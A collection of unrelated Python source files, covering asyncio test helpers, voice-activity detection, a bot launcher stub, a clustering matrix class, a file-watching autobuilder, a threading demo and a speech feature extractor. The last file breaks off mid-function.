def _add_reader(self, fd, callback, *args):
self.readers[fd] = events.Handle(callback, args, self)
def _remove_reader(self, fd):
self.remove_reader_count[fd] += 1
if fd in self.readers:
del self.readers[fd]
return True
else:
return False
def assert_reader(self, fd, callback, *args):
assert fd in self.readers, 'fd {} is not registered'.format(fd)
handle = self.readers[fd]
assert handle._callback == callback, '{!r} != {!r}'.format(
handle._callback, callback)
assert handle._args == args, '{!r} != {!r}'.format(
handle._args, args)
def _add_writer(self, fd, callback, *args):
self.writers[fd] = events.Handle(callback, args, self)
def _remove_writer(self, fd):
self.remove_writer_count[fd] += 1
if fd in self.writers:
del self.writers[fd]
return True
else:
return False
def assert_writer(self, fd, callback, *args):
assert fd in self.writers, 'fd {} is not registered'.format(fd)
handle = self.writers[fd]
assert handle._callback == callback, '{!r} != {!r}'.format(
handle._callback, callback)
assert handle._args == args, '{!r} != {!r}'.format(
handle._args, args)
def _ensure_fd_no_transport(self, fd):
if not isinstance(fd, int):
try:
fd = int(fd.fileno())
except (AttributeError, TypeError, ValueError):
# This code matches selectors._fileobj_to_fd function.
raise ValueError("Invalid file object: "
"{!r}".format(fd)) from None
try:
transport = self._transports[fd]
except KeyError:
pass
else:
raise RuntimeError(
'File descriptor {!r} is used by transport {!r}'.format(
fd, transport))
def add_reader(self, fd, callback, *args):
"""Add a reader callback."""
self._ensure_fd_no_transport(fd)
return self._add_reader(fd, callback, *args)
def remove_reader(self, fd):
"""Remove a reader callback."""
self._ensure_fd_no_transport(fd)
return self._remove_reader(fd)
def add_writer(self, fd, callback, *args):
"""Add a writer callback.."""
self._ensure_fd_no_transport(fd)
return self._add_writer(fd, callback, *args)
def remove_writer(self, fd):
"""Remove a writer callback."""
self._ensure_fd_no_transport(fd)
return self._remove_writer(fd)
def reset_counters(self):
self.remove_reader_count = collections.defaultdict(int)
self.remove_writer_count = collections.defaultdict(int)
def _run_once(self):
super()._run_once()
for when in self._timers:
advance = self._gen.send(when)
self.advance_time(advance)
self._timers = []
def call_at(self, when, callback, *args):
self._timers.append(when)
return super().call_at(when, callback, *args)
def _process_events(self, event_list):
return
def _write_to_self(self):
pass
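# Hedged illustration (not part of the original module) of the time-generator
# protocol TestLoop expects: the value sent into the generator is the absolute
# deadline of the next scheduled handler, and the value it yields back is how
# far to advance the mock clock. The 0.1/0.2 deadlines are hypothetical.
def _example_time_gen():
    when = yield            # primed by next() in TestLoop.__init__
    assert when == 0.1      # first handler scheduled at t=0.1 (hypothetical)
    when = yield 0.1        # advance the clock by 0.1 to reach it
    assert when == 0.2      # second handler at t=0.2 (hypothetical)
    yield 0.1               # advance again, then finish so close() sees StopIteration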
def MockCallback(**kwargs):
return mock.Mock(spec=['__call__'], **kwargs)
class MockPattern(str):
"""A regex based str with a fuzzy __eq__.
Use this helper with 'mock.assert_called_with', or anywhere
where a regex comparison between strings is needed.
For instance:
mock_call.assert_called_with(MockPattern('spam.*ham'))
"""
def __eq__(self, other):
return bool(re.search(str(self), other, re.S))
def get_function_source(func):
source = events._get_function_source(func)
if source is None:
raise ValueError("unable to get the source of %r" % (func,))
return source
class TestCase(unittest.TestCase):
@staticmethod
def close_loop(loop):
executor = loop._default_executor
if executor is not None:
executor.shutdown(wait=True)
loop.close()
def set_event_loop(self, loop, *, cleanup=True):
assert loop is not None
# ensure that the event loop is passed explicitly in asyncio
events.set_event_loop(None)
if cleanup:
self.addCleanup(self.close_loop, loop)
def new_test_loop(self, gen=None):
loop = TestLoop(gen)
self.set_event_loop(loop)
return loop
def unpatch_get_running_loop(self):
events._get_running_loop = self._get_running_loop
def setUp(self):
self._get_running_loop = events._get_running_loop
events._get_running_loop = lambda: None
self._thread_cleanup = support.threading_setup()
def tearDown(self):
self.unpatch_get_running_loop()
events.set_event_loop(None)
# Detect CPython bug #23353: ensure that yield/yield-from is not used
# in an except block of a generator
self.assertEqual(sys.exc_info(), (None, None, None))
self.doCleanups()
support.threading_cleanup(*self._thread_cleanup)
support.reap_children()
@contextlib.contextmanager
def disable_logger():
"""Context manager to disable asyncio logger.
For example, it can be used to ignore warnings in debug mode.
"""
old_level = logger.level
try:
logger.setLevel(logging.CRITICAL+1)
yield
finally:
logger.setLevel(old_level)
def mock_nonblocking_socket(proto=socket.IPPROTO_TCP, type=socket.SOCK_STREAM,
family=socket.AF_INET):
"""Create a mock of a non-blocking socket."""
sock = mock.MagicMock(socket.socket)
sock.proto = proto
sock.type = type
sock.family = family
sock.gettimeout.return_value = 0.0
return sock
def force_legacy_ssl_support():
return mock.patch('asyncio.sslproto._is_sslproto_available',
return_value=False)
|
VoiceActivityDetection.py
|
import wave
import threading
import numpy as np
import torch
torch.set_num_threads(1)
import torchaudio
import matplotlib.pylab as plt
torchaudio.set_audio_backend("soundfile")
import pyaudio
import time
from io import BytesIO
# import globalVAR
plt.rcParams["figure.figsize"]=(12,3)
model, utils = torch.hub.load(repo_or_dir='snakers4/silero-vad',
model='silero_vad')
(get_speech_ts,
get_speech_ts_adaptive,
save_audio,
read_audio,
state_generator,
single_audio_stream,
collect_chunks) = utils
# model, utils = sendMU()
global vc1, vc2, vc3, vc4
global sc1, sc2, sc3, sc4
sc1 = 0
sc2 = 0
sc3 = 0
sc4 = 0
vc1 = []
vc2 = []
vc3 = []
vc4 = []
def validate(model,
inputs: torch.Tensor):
with torch.no_grad():
outs = model(inputs)
return outs
def int2float(sound):
abs_max = np.abs(sound).max()
sound = sound.astype('float32')
if abs_max > 0:
sound *= 1/abs_max
sound = sound.squeeze() # depends on the use case
return sound
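def chunk_to_tensor(audio_chunk):
    # Minimal sketch (assumes a 16-bit mono PCM chunk, e.g. the bytes returned
    # by wave.readframes): convert a raw chunk into the normalized float32
    # tensor that the Silero VAD model below consumes.
    audio_int16 = np.frombuffer(audio_chunk, np.int16)
    return torch.from_numpy(int2float(audio_int16))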
SAMPLE_RATE = 16000
frames_to_record = 20 # frames_to_record * frame_duration_ms = recording duration
frame_duration_ms = 250
# audio = pyaudio.PyAudio()
# data = []
# voiced_confidences = []
# test_confidences = []
# from jupyterplot import ProgressPlot
continue_recording = True
def stop():
input("Press Enter to stop the recording:")
global continue_recording
continue_recording = False
# def multi_audio():
# vadStart("SampleAudio1.wav")
# vadStart("SampleAudio2.wav")
# vadStart("SampleAudio3.wav")
# vadStart("SampleAudio4.wav")
def vadStart(wavPATH, sCount):
audio = pyaudio.PyAudio()
# wave.open(wavPATH, 'rb')
with wave.open(wavPATH, 'rb') as f:
width = f.getsampwidth()
channels = f.getnchannels()
rate = f.getframerate()
# stream = audio.open(
# format=width,
# channels=channels,
# rate=rate,
# frames_per_buffer=int(rate / 10),
# output = True
# )
startTime=time.time()
data = []
        voiced_confidences = []  # this might become a problem?
test_confidences = []
global continue_recording
continue_recording = True
# stop_listener = threading.Thread(target=stop)
# stop_listener.start()
isAgain = False
temp_confidence = []
speechCount = 0
checkTime = 0
i=1
while continue_recording:
# audio_chunk = stream.read(int(SAMPLE_RATE * frame_duration_ms / 1000.0), exception_on_overflow=False)
audio_chunk = f.readframes(int(SAMPLE_RATE * frame_duration_ms / 1000.0))
# print(type(audio_chunk))
# print(int(SAMPLE_RATE * frame_duration_ms / 1000.0))
# data.append(audio_chunk)
audio_int16 = np.frombuffer(audio_chunk, np.int16)
audio_float32 = int2float(audio_int16)
# if(int(time.time()-startTime)):
# print(i, "초!")
# i=i+1
# get the confidences and add them to the list to plot them later
vad_outs = validate(model, torch.from_numpy(audio_float32))
# get the confidence value so that jupyterplot can process it
new_confidence = vad_outs[:, 1].numpy()[0].item()
# new_confidence = vad_outs[:, 1]
            if new_confidence > 0.2 and isAgain is False:  # above the threshold!
isAgain = True
checkTime = time.time()
if isAgain is True:
temp_confidence.append(new_confidence)
nowTime=time.time()
                if nowTime - checkTime > 10:  # once the time span (10 s here) has elapsed
temp_avg = sum(temp_confidence)/len(temp_confidence)
temp_spoken = sum(map(lambda x: x > 0.2, temp_confidence))
temp_spoken_ratio = temp_spoken/len(temp_confidence)
                    if temp_spoken_ratio > 0.04:  # if enough of the window was speech, count it as a presentation
speechCount+=1
balpyo_time = nowTime-startTime
print("발표! {}분 {}초".format(int(balpyo_time/60), int(balpyo_time%60)))
temp_confidence.clear()
isAgain=False
if len(voiced_confidences)>50 :
del voiced_confidences[0]
voiced_confidences.append(new_confidence)
test_confidences.append(new_confidence)
# print(wavPATH,"\t\t\t", voiced_confidences, "\n\n\n")
sCount.value = speechCount
if wavPATH=='record1.wav':
global vc1, sc1
vc1 = voiced_confidences
sc1 = speechCount
# print(vc1, sc1)
# que.put("1")
elif wavPATH=='record2.wav':
global vc2, sc2
vc2 = voiced_confidences
sc2 = speechCount
# print(vc2, sc2)
# que.put("2")
elif wavPATH=='record3.wav':
global vc3, sc3
vc3 = voiced_confidences
sc3 = speechCount
# print(vc3, sc3)
# globalVAR.vc3.append(voiced_confidences)
elif wavPATH=='record4.wav':
global vc4, sc4
vc4 = voiced_confidences
sc4 = speechCount
# print(vc4, sc4)
# globalVAR.vc4.append(voiced_confidences)
# print(type(voiced_confidences))
# pp.update(new_confidence)
            # plotting section (kept inline for now)
plt.switch_backend('agg')
plt.clf()
plt.ylim([0,1])
plt.xticks([])
plt.plot(voiced_confidences)
plt.axhline(y=0.7, color='r')
plt.pause(0.00001)
print("\n\n총 발표 횟수 : ",speechCount)
# pp.finalize()
# plt.plot(new_confidence)
# plt.figure(figsize=(12, 6))
endTime = time.time()
timeSpan = endTime-startTime
# print(timeSpan)
# print(voiced_confidences)
count = sum(map(lambda x: x > 0.7, test_confidences))
length = len(test_confidences)
# print("발화 비율 : ", (count/length)*100, "%")
# plt.savefig('vad_result.png', bbox_inches='tight')
# plt.show()
def setVADdata(sampleNum):
global vc1, vc2, vc3, vc4
global sc1, sc2, sc3, sc4
# return voiced_confidences
if sampleNum==1:
return vc1, sc1
elif sampleNum==2:
return vc2, sc2
elif sampleNum==3:
return vc3, sc3
elif sampleNum==4:
return vc4, sc4
def setVC1():
global vc1
return vc1
def setVC2():
global vc2
return vc2
def setSC1():
global sc1
return sc1
def setSC2():
global sc2
return sc2
def setSC3():
global sc3
return sc3
def setSC4():
global sc4
return sc4
def getPlot(imgNum):
    # Render the requested speaker's confidence trace into an in-memory PNG
    # buffer and return it (imgNum selects which voiced-confidence list to plot).
    plt.clf()
    plt.ylim([0, 1])
    plt.xticks([])
    plt.axhline(y=0.7, color='r')
    buf = BytesIO()
    if imgNum == 1:
        plt.plot(vc1)
    elif imgNum == 2:
        plt.plot(vc2)
    elif imgNum == 3:
        plt.plot(vc3)
    elif imgNum == 4:
        plt.plot(vc4)
    plt.savefig(buf, format='png', bbox_inches='tight', dpi=200)
    return buf
# plt.pause(0.00001)
|
Xwars.py
|
from wariors import Xbots
import threading
def login(name, auth):
bot = Xbots(name, auth)
threading.Thread(target=login, args=('b1','TOKEN_BOT')).start()
print("""
░▀░ █▀▀▄ █▀▀ █░█ █▀▀▄ █▀▀█ ▀▀█▀▀ █▀▀
▀█▀ █░░█ █▀▀ ▄▀▄ █▀▀▄ █░░█ ░░█░░ ▀▀█
▀▀▀ ▀░░▀ ▀▀▀ ▀░▀ ▀▀▀░ ▀▀▀▀ ░░▀░░ ▀▀▀
▄█░ ░█▀█░ ▄ █▀▀█ ▄▀▀▄ ▄ █▀█ █▀▀█ ▄█░ ▄▀▀▄
░█░ █▄▄█▄ ░ █▄▀█ █▄▄░ ░ ░▄▀ █▄▀█ ░█░ ▀▄▄█
▄█▄ ░░░█░ ▀ █▄▄█ ▀▄▄▀ ▀ █▄▄ █▄▄█ ▄█▄ ░▄▄▀ """)
|
matrix.py
|
#
# This is part of "python-cluster". A library to group similar items together.
# Copyright (C) 2006 Michel Albert
#
# This library is free software; you can redistribute it and/or modify it
# under the terms of the GNU Lesser General Public License as published by the
# Free Software Foundation; either version 2.1 of the License, or (at your
# option) any later version.
# This library is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License
# for more details.
# You should have received a copy of the GNU Lesser General Public License
# along with this library; if not, write to the Free Software Foundation,
# Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
#
import logging
from multiprocessing import Process, Queue, current_process
logger = logging.getLogger(__name__)
class Matrix(object):
"""
Object representation of the item-item matrix.
"""
def __init__(self, data, combinfunc, symmetric=False, diagonal=None):
"""
Takes a list of data and generates a 2D-matrix using the supplied
combination function to calculate the values.
:param data: the list of items.
        :param combinfunc: the function that is used to calculate the value in a
cell. It has to cope with two arguments.
:param symmetric: Whether it will be a symmetric matrix along the
diagonal. For example, if the list contains integers, and the
combination function is ``abs(x-y)``, then the matrix will be
symmetric.
:param diagonal: The value to be put into the diagonal. For some
functions, the diagonal will stay constant. An example could be the
function ``x-y``. Then each diagonal cell will be ``0``. If this
value is set to None, then the diagonal will be calculated.
"""
self.data = data
self.combinfunc = combinfunc
self.symmetric = symmetric
self.diagonal = diagonal
def worker(self):
"""
Multiprocessing task function run by worker processes
"""
tasks_completed = 0
for task in iter(self.task_queue.get, 'STOP'):
col_index, item, item2 = task
if not hasattr(item, '__iter__') or isinstance(item, tuple):
item = [item]
if not hasattr(item2, '__iter__') or isinstance(item2, tuple):
item2 = [item2]
result = (col_index, self.combinfunc(item, item2))
self.done_queue.put(result)
tasks_completed += 1
logger.info("Worker %s performed %s tasks",
current_process().name,
tasks_completed)
def genmatrix(self, num_processes=1):
"""
Actually generate the matrix
:param num_processes: If you want to use multiprocessing to split up the
work and run ``combinfunc()`` in parallel, specify
``num_processes > 1`` and this number of workers will be spun up,
the work is split up amongst them evenly.
"""
use_multiprocessing = num_processes > 1
if use_multiprocessing:
self.task_queue = Queue()
self.done_queue = Queue()
self.matrix = []
logger.info("Generating matrix for %s items - O(n^2)", len(self.data))
if use_multiprocessing:
logger.info("Using multiprocessing on %s processes!", num_processes)
if use_multiprocessing:
logger.info("Spinning up %s workers", num_processes)
processes = [Process(target=self.worker) for i in range(num_processes)]
[process.start() for process in processes]
for row_index, item in enumerate(self.data):
logger.debug("Generating row %s/%s (%0.2f%%)",
row_index,
len(self.data),
100.0 * row_index / len(self.data))
row = {}
if use_multiprocessing:
num_tasks_queued = num_tasks_completed = 0
for col_index, item2 in enumerate(self.data):
if self.diagonal is not None and col_index == row_index:
# This is a cell on the diagonal
row[col_index] = self.diagonal
elif self.symmetric and col_index < row_index:
# The matrix is symmetric and we are "in the lower left
# triangle" - fill this in after (in case of multiprocessing)
pass
# Otherwise, this cell is not on the diagonal and we do indeed
# need to call combinfunc()
elif use_multiprocessing:
# Add that thing to the task queue!
self.task_queue.put((col_index, item, item2))
num_tasks_queued += 1
# Start grabbing the results as we go, so as not to stuff all of
# the worker args into memory at once (as Queue.get() is a
# blocking operation)
if num_tasks_queued > num_processes:
col_index, result = self.done_queue.get()
row[col_index] = result
num_tasks_completed += 1
else:
# Otherwise do it here, in line
if not hasattr(item, '__iter__') or isinstance(item, tuple):
item = [item]
if not hasattr(item2, '__iter__') or isinstance(item2, tuple):
item2 = [item2]
row[col_index] = self.combinfunc(item, item2)
if self.symmetric:
# One more iteration to get symmetric lower left triangle
for col_index, item2 in enumerate(self.data):
if col_index >= row_index:
break
# post-process symmetric "lower left triangle"
row[col_index] = self.matrix[col_index][row_index]
if use_multiprocessing:
# Grab the remaining worker task results
while num_tasks_completed < num_tasks_queued:
col_index, result = self.done_queue.get()
row[col_index] = result
num_tasks_completed += 1
row_indexed = [row[index] for index in range(len(self.data))]
self.matrix.append(row_indexed)
if use_multiprocessing:
logger.info("Stopping/joining %s workers", num_processes)
[self.task_queue.put('STOP') for i in range(num_processes)]
[process.join() for process in processes]
logger.info("Matrix generated")
def __str__(self):
"""
Returns a 2-dimensional list of data as text-string which can be
displayed to the user.
"""
# determine maximum length
maxlen = 0
colcount = len(self.data[0])
for col in self.data:
for cell in col:
maxlen = max(len(str(cell)), maxlen)
format = " %%%is |" % maxlen
format = "|" + format * colcount
rows = [format % tuple(row) for row in self.data]
return "\n".join(rows)
|
autoreloader.py
|
import os
import time
import traceback
from watchdog.observers import Observer
from watchdog.events import FileSystemEventHandler, FileSystemEvent
import subprocess
import shlex
import threading
from plbuilder.paths import SOURCE_PATH
def autobuild():
"""
Starts a process which watches for file system events on sources in the current pl-builder project, and
automatically builds sources in response to changes.
"""
autobuild_at_path(SOURCE_PATH)
def autobuild_at_path(watch_path: str):
# setting up inotify and specifying path to watch
print(f'Starting autobuilder, watching for changes in {watch_path}')
observer = Observer()
event_handler = AutoBuildEventHandler()
observer.schedule(event_handler, watch_path, recursive=True)
observer.start()
try:
while True:
time.sleep(1)
except KeyboardInterrupt:
observer.stop()
observer.join()
old = 0.0
class AutoBuildEventHandler(FileSystemEventHandler):
def on_modified(self, event: FileSystemEvent):
global old
super().on_modified(event)
if event.src_path.endswith('.py'):
# Watchdog has a bug where two events will be triggered very quickly for one modification.
# Track whether it's been at least a half second since the last modification, and only then
# consider it a valid event
stat_buf = os.stat(event.src_path)
new = stat_buf.st_mtime
if (new - old) > 0.5:
# This is a valid event, now the main logic
self._build(event.src_path)
old = new
def _build(self, file_path: str):
"""
Run build using subprocess so that imports will be executed every time
:param file_path:
:return:
"""
command = f'plbuilder build {file_path}'
run_command(command)
def run_command(command):
p = subprocess.Popen(shlex.split(command), stdin=subprocess.PIPE,
stdout=subprocess.PIPE, stderr=subprocess.STDOUT,
universal_newlines=True)
t = threading.Thread(target=_stdout_printer, args=(p,))
t.start()
p.stdin.close()
t.join()
def _stdout_printer(p):
for line in p.stdout:
print(line.rstrip())
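if __name__ == "__main__":
    # Hedged usage sketch (not part of the original module): watch the current
    # working directory instead of the project's SOURCE_PATH; Ctrl+C stops the
    # observer via the KeyboardInterrupt handler above.
    autobuild_at_path(os.path.abspath("."))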
|
multithread2.py
|
"""
使用多线程的情况 - 模拟多个下载任务
Version: 0.1
Author: BDFD
Date: 2018-03-20
"""
from random import randint
from threading import Thread
from time import time, sleep
def download_task(filename):
    print('Started downloading %s...' % filename)
time_to_download = randint(5, 10)
sleep(time_to_download)
    print('%s finished downloading! It took %d seconds' % (filename, time_to_download))
def main():
start = time()
thread1 = Thread(target=download_task, args=('Python从入门到住院.pdf',))
thread1.start()
thread2 = Thread(target=download_task, args=('Peking Hot.avi',))
thread2.start()
thread1.join()
thread2.join()
end = time()
    print('Total time elapsed: %.3f seconds' % (end - start))
if __name__ == '__main__':
main()
|
feature_extract.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright 2020 Patrick Lumban Tobing (Nagoya University)
# based on PyTorch implementation for WaveNet vocoder by Tomoki Hayashi (Nagoya University)
# Apache 2.0 (http://www.apache.org/licenses/LICENSE-2.0)
from __future__ import division
from __future__ import print_function
import argparse
import multiprocessing as mp
import os
import sys
from distutils.util import strtobool
import logging
import numpy as np
from numpy.matlib import repmat
from scipy.interpolate import interp1d
import soundfile as sf
from scipy.signal import firwin
from scipy.signal import lfilter
import librosa
from utils import find_files
from utils import read_txt
from utils import write_hdf5, read_hdf5
from multiprocessing import Array
import pysptk as ps
import pyworld as pw
#np.set_printoptions(threshold=np.inf)
FS = 24000
SHIFTMS = 5
MINF0 = 40
MAXF0 = 700
WINMS = 27.5
MEL_DIM = 80
MCEP_DIM = 49
MCEP_ALPHA = 0.466 #24k
FFTL = 2048
IRLEN = 1024
LOWPASS_CUTOFF = 20
HIGHPASS_CUTOFF = 65
OVERWRITE = True
MAX_CODEAP = -8.6856974912498e-12
def melsp(x, n_mels=MEL_DIM, n_fft=FFTL, shiftms=SHIFTMS, winms=WINMS, fs=FS):
hop_length = int((fs/1000)*shiftms)
win_length = int((fs/1000)*winms)
stft = librosa.core.stft(x, n_fft=n_fft, hop_length=hop_length, win_length=win_length, window='hann')
magspec = np.abs(stft)
melfb = librosa.filters.mel(fs, n_fft, n_mels=n_mels)
return np.dot(melfb, magspec).T
def low_cut_filter(x, fs, cutoff=HIGHPASS_CUTOFF):
"""FUNCTION TO APPLY LOW CUT FILTER
Args:
x (ndarray): Waveform sequence
fs (int): Sampling frequency
cutoff (float): Cutoff frequency of low cut filter
Return:
(ndarray): Low cut filtered waveform sequence
"""
nyquist = fs // 2
norm_cutoff = cutoff / nyquist
# low cut filter
fil = firwin(1023, norm_cutoff, pass_zero=False)
lcf_x = lfilter(fil, 1, x)
return lcf_x
def analyze(wav, fs=FS, minf0=MINF0, maxf0=MAXF0, fperiod=SHIFTMS, fftl=FFTL, f0=None, time_axis=None):
if f0 is None or time_axis is None:
_f0, time_axis = pw.harvest(wav, fs, f0_floor=60.0, frame_period=fperiod)
f0 = pw.stonemask(wav, _f0, time_axis, fs)
sp = pw.cheaptrick(wav, f0, time_axis, fs, fft_size=fftl)
ap = pw.d4c(wav, f0, time_axis, fs, fft_size=fftl)
return time_axis, f0, sp, ap
def analyze_range(wav, fs=FS, minf0=MINF0, maxf0=MAXF0, fperiod=SHIFTMS, fftl=FFTL, f0=None, time_axis=None):
if f0 is None or time_axis is None:
_f0, time_axis = pw.harvest(wav, fs, f0_floor=minf0, f0_ceil=maxf0, frame_period=fperiod)
f0 = pw.stonemask(wav, _f0, time_axis, fs)
sp = pw.cheaptrick(wav, f0, time_axis, fs, fft_size=fftl)
ap = pw.d4c(wav, f0, time_axis, fs, fft_size=fftl)
return time_axis, f0, sp, ap
def read_wav(wav_file, cutoff=HIGHPASS_CUTOFF):
x, fs = sf.read(wav_file)
if cutoff != 0:
x = low_cut_filter(x, fs, cutoff)
return fs, x
def convert_f0(f0, f0_mean_src, f0_std_src, f0_mean_trg, f0_std_trg):
nonzero_indices = f0 > 0
cvf0 = np.zeros(len(f0))
cvf0[nonzero_indices] = \
np.exp((f0_std_trg/f0_std_src)*(np.log(f0[nonzero_indices])-f0_mean_src)+f0_mean_trg)
return cvf0
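def _example_convert_f0():
    # Hedged illustration with hypothetical speaker statistics: the mean/std
    # arguments are log-F0 values, so a voiced 150 Hz frame is mapped through
    # exp((0.25/0.2) * (log(150) - 5.0) + 5.3), while unvoiced frames (f0 == 0)
    # stay at 0.
    f0 = np.array([0.0, 150.0, 200.0])
    return convert_f0(f0, f0_mean_src=5.0, f0_std_src=0.2,
                      f0_mean_trg=5.3, f0_std_trg=0.25)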
def mod_pow(cvmcep, mcep, alpha=MCEP_ALPHA, irlen=IRLEN):
cv_e = ps.mc2e(cvmcep, alpha=alpha, irlen=irlen)
r_e = ps.mc2e(mcep, alpha=alpha, irlen=irlen)
dpow = np.log(r_e/cv_e) / 2
mod_cvmcep = np.copy(cvmcep)
mod_cvmcep[:,0] += dpow
return mod_cvmcep
def extfrm(data, npow, power_threshold=-20):
T = data.shape[0]
if T != len(npow):
raise("Length of two vectors is different.")
valid_index = np.where(npow > power_threshold)
extdata = data[valid_index]
assert extdata.shape[0] <= T
return extdata, valid_index
def spc2npow(spectrogram):
npow = np.apply_along_axis(spvec2pow, 1, spectrogram)
meanpow = np.mean(npow)
npow = 10.0 * np.log10(npow/meanpow)
return npow
def spvec2pow(specvec):
fftl2 = len(specvec) - 1
fftl = fftl2 * 2
power = specvec[0] + specvec[fftl2]
for k in range(1, fftl2):
power += 2.0 * specvec[k]
power /= fftl
return power
def low_pass_filter(x, fs, cutoff=LOWPASS_CUTOFF, padding=True):
"""FUNCTION TO APPLY LOW PASS FILTER
Args:
x (ndarray): Waveform sequence
fs (int): Sampling frequency
cutoff (float): Cutoff frequency of low pass filter
Return:
(ndarray): Low pass filtered waveform sequence
"""
nyquist = fs // 2
norm_cutoff = cutoff / nyquist
    # low pass filter
numtaps = 255
fil = firwin(numtaps, norm_cutoff)
x_pad = np.pad(x, (numtaps, numtaps), 'edge')
lpf_x = lfilter(fil, 1, x_pad)
lpf_x = lpf_x[numtaps + numtaps // 2: -numtaps // 2]
return lpf_x
def convert_continuos_f0(f0):
"""CONVERT F0 TO CONTINUOUS F0
Args:
f0 (ndarray): original f0 sequence with the shape (T)
Return:
(ndarray): continuous f0 with the shape (T)
"""
# get uv information as binary
uv = np.float32(f0 != 0)
# get start and end of f0
start_f0 = f0[f0 != 0][0]
end_f0 = f0[f0 != 0][-1]
# padding start and end of f0 sequence
start_idx = np.where(f0 == start_f0)[0][0]
end_idx = np.where(f0 == end_f0)[0][-1]
f0[:start_idx] = start_f0
f0[end_idx:] = end_f0
# get non-zero frame index
nz_frames = np.where(f0 != 0)[0]
# perform linear interpolation
f = interp1d(nz_frames, f0[nz_frames])
cont_f0 = f(np.arange(0, f0.shape[0]))
return uv, cont_f0
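def _example_convert_continuos_f0():
    # Hedged illustration: zeros mark unvoiced frames; the gap at index 3 is
    # bridged by linear interpolation between the neighbouring voiced frames.
    # Expected result: uv      = [0, 0, 1, 0, 1, 0]
    #                  cont_f0 = [100, 100, 100, 105, 110, 110]
    # (note that the input array is edge-padded in place).
    f0 = np.array([0.0, 0.0, 100.0, 0.0, 110.0, 0.0])
    return convert_continuos_f0(f0)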
def convert_continuos_codeap(codeap):
"""CONVERT codeap TO CONTINUOUS codeap
Args:
codeap (ndarray): original codeap sequence with the shape (T)
Return:
(ndarray): continuous codeap with the shape (T)
"""
# get uv information as binary
uv = np.float32(codeap < MAX_CODEAP)
# get start and end of codeap
start_codeap = codeap[codeap < MAX_CODEAP][0]
end_codeap = codeap[codeap < MAX_CODEAP][-1]
# padding start and end of codeap sequence
start_idx = np.where(codeap == start_codeap)[0][0]
end_idx = np.where(codeap == end_codeap)[0][-1]
codeap[:start_idx] = start_codeap
codeap[end_idx:] = end_codeap
# get non-zero frame index
nz_frames = np.where(codeap < MAX_CODEAP)[0]
# perform linear interpolation
f = interp1d(nz_frames, codeap[nz_frames])
cont_codeap = f(np.arange(0, codeap.shape[0]))
return uv, cont_codeap
def main():
parser = argparse.ArgumentParser(
description="making feature file argsurations.")
parser.add_argument("--expdir", required=True,
type=str, help="directory to save the log")
parser.add_argument(
"--waveforms", default=None,
help="directory or list of filename of input wavfile")
parser.add_argument(
"--hdf5dir", default=None,
help="directory to save hdf5")
parser.add_argument(
"--wavdir", default=None,
help="directory to save of analysis-synthesis WORLD wav file")
parser.add_argument(
"--wavgfdir", default=None,
help="directory to save of analysis-synthesis Griffin-Lim wav file")
parser.add_argument(
"--wavfiltdir", default=None,
help="directory to save of preprocessed wav file")
parser.add_argument(
"--fs", default=FS,
type=int, help="Sampling frequency")
parser.add_argument(
"--shiftms", default=SHIFTMS,
type=float, help="Frame shift in msec for WORLD extract.")
parser.add_argument(
"--minf0", default=MINF0,
type=int, help="minimum f0")
parser.add_argument(
"--maxf0", default=MAXF0,
type=int, help="maximum f0")
parser.add_argument(
"--winms", default=WINMS,
type=float, help="Frame shift in msec for Mel-Spectrogram extract.")
parser.add_argument(
"--mcep_dim", default=MCEP_DIM,
type=int, help="Dimension of mel-cepstrum")
parser.add_argument(
"--mel_dim", default=MEL_DIM,
type=int, help="Dimension of mel-spectrogram")
parser.add_argument(
"--mcep_alpha", default=MCEP_ALPHA,
type=float, help="Alpha of mel cepstrum")
parser.add_argument(
"--pow", default=-20,
type=float, help="Power threshold")
parser.add_argument(
"--fftl", default=FFTL,
type=int, help="FFT length")
parser.add_argument("--init", default=False,
type=strtobool, help="flag for computing stats with initial configs.")
parser.add_argument(
"--highpass_cutoff", default=HIGHPASS_CUTOFF,
type=int, help="Cut off frequency in lowpass filter")
parser.add_argument(
"--n_jobs", default=10,
type=int, help="number of parallel jobs")
parser.add_argument(
"--verbose", default=1,
type=int, help="log message level")
args = parser.parse_args()
# set log level
if args.verbose == 1:
logging.basicConfig(level=logging.INFO,
format='%(asctime)s (%(module)s:%(lineno)d) %(levelname)s: %(message)s',
datefmt='%m/%d/%Y %I:%M:%S',
filename=args.expdir + "/feature_extract.log")
logging.getLogger().addHandler(logging.StreamHandler())
elif args.verbose > 1:
logging.basicConfig(level=logging.DEBUG,
format='%(asctime)s (%(module)s:%(lineno)d) %(levelname)s: %(message)s',
datefmt='%m/%d/%Y %I:%M:%S',
filename=args.expdir + "/feature_extract.log")
logging.getLogger().addHandler(logging.StreamHandler())
else:
logging.basicConfig(level=logging.WARN,
format='%(asctime)s (%(module)s:%(lineno)d) %(levelname)s: %(message)s',
datefmt='%m/%d/%Y %I:%M:%S',
filename=args.expdir + "/feature_extract.log")
logging.getLogger().addHandler(logging.StreamHandler())
logging.warn("logging is disabled.")
# read list
if os.path.isdir(args.waveforms):
file_list = sorted(find_files(args.waveforms, "*.wav"))
else:
file_list = read_txt(args.waveforms)
# check directory existence
if (args.wavdir is not None) and (not os.path.exists(args.wavdir)):
os.makedirs(args.wavdir)
if (args.wavgfdir is not None) and (not os.path.exists(args.wavgfdir)):
os.makedirs(args.wavgfdir)
if (args.wavfiltdir is not None) and (not os.path.exists(args.wavfiltdir)):
os.makedirs(args.wavfiltdir)
if not os.path.exists(args.hdf5dir):
os.makedirs(args.hdf5dir)
def feature_extract(cpu, wav_list, arr, max_frame_list, max_spc_frame_list):
n_wav = len(wav_list)
n_sample = 0
n_frame = 0
max_frame = 0
max_spc_frame = 0
count = 1
melfb_t = np.linalg.pinv(librosa.filters.mel(args.fs, args.fftl, n_mels=args.mel_dim))
for wav_name in wav_list:
# load wavfile and apply low cut filter
fs, x = read_wav(wav_name, cutoff=args.highpass_cutoff)
n_sample += x.shape[0]
logging.info("cpu-"+str(cpu+1)+" "+str(len(wav_list))+" "+wav_name+" "+str(x.shape[0])+" "+str(n_sample)+" "+str(count))
logging.info(wav_list)
# check sampling frequency
if not fs == args.fs:
logging.info("ERROR: sampling frequency is not matched.")
sys.exit(1)
hdf5name = args.hdf5dir + "/" + os.path.basename(wav_name).replace(".wav", ".h5")
if not args.init:
if args.minf0 != 40 and args.maxf0 != 700:
